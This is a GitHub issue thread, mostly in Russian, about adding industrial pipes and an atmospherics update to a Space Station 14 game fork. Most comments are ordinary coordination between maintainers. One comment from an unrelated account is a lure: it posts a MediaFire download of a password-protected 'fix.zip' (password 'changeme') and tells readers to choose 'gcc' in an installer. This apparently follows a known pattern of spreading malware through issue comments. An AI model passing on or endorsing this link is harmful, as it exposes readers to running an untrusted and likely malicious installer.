### ISSUE TITLE
Промышленные трубы. Обновление атмоса

### ISSUE THREAD

**Issue by Bolper** [AdventureTimeSS14/space_station_ADT#362]
тут нет описания

no cl, no fun

**Comment by Bolper** [comment]
https://discord.com/channels/901772674865455115/1278045633088983123

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Flopochka** [comment]
no no no, мыж с петром придумали другое...

**Comment by Bolper** [comment]
> no no no, мыж с петром придумали другое...

Ты меня пинганул где? В багах с этой хернёй. Я читать особо не буду о чем было выше написано. В следующий раз указывай именно како йтесь надо сделать

**Comment by Bolper** [comment]
![Image](https://github.com/user-attachments/assets/2ea10e3d-6887-4429-9ad8-3272648be18d)
![Image](https://github.com/user-attachments/assets/13e68736-f3e5-41fd-9fe5-323ab0471bed)

**Comment by Unlumy** [comment]
@KashRas2 Надо заняться.
И поменять стоимость других технологий, ато стало гигажирно.

**Comment by Unlumy** [comment]
@PyotrIgn промышленных труб нету ещё.
